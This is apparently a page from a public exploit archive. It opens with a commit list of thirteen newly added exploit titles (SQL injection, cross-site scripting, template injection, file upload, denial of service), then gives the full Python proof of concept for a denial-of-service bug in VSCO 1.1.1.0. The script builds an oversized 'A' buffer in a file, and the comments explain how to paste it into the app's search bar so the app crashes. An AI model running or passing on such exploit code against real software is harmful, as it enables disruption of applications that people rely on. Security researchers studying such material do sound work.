f3f1427938
9 changes to exploits/shellcodes ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS) ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC) AirMore 1.6.1 - Denial of Service (PoC) Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC) Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC) VSCO 1.1.1.0 - Denial of Service (PoC) Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference Webiness Inventory 2.3 - SQL Injection Webiness Inventory 2.3 - 'order' SQL Injection MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery Jinja2 2.10 - 'from_string' Server Side Template Injection qdPM 9.1 - 'search_by_extrafields[]' SQL Injection UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload
26 lines
No EOL
748 B
Python
Executable file
26 lines
No EOL
748 B
Python
Executable file
# Exploit Title: VSCO 1.1.1.0 - Denial of Service (PoC)
|
|
# Date: 2/14/2018
|
|
# Author: 0xB9
|
|
# Twitter: @0xB9Sec
|
|
# Contact: 0xB9[at]pm.me
|
|
# Software Link: https://www.microsoft.com/store/productId/9NC1RLNH76PB
|
|
# Version: 1.1.1.0
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept:
|
|
# Run the python script, it will create a new file "PoC.txt"
|
|
# Copy the text from the generated PoC.txt file to clipboard
|
|
# Paste the text in the top right search bar and hit Search
|
|
# Click back to Home
|
|
# App will now crash
|
|
|
|
buffer = "A" * 5000
|
|
payload = buffer
|
|
try:
|
|
f=open("PoC.txt","w")
|
|
print "[+] Creating %s evil payload.." %len(payload)
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |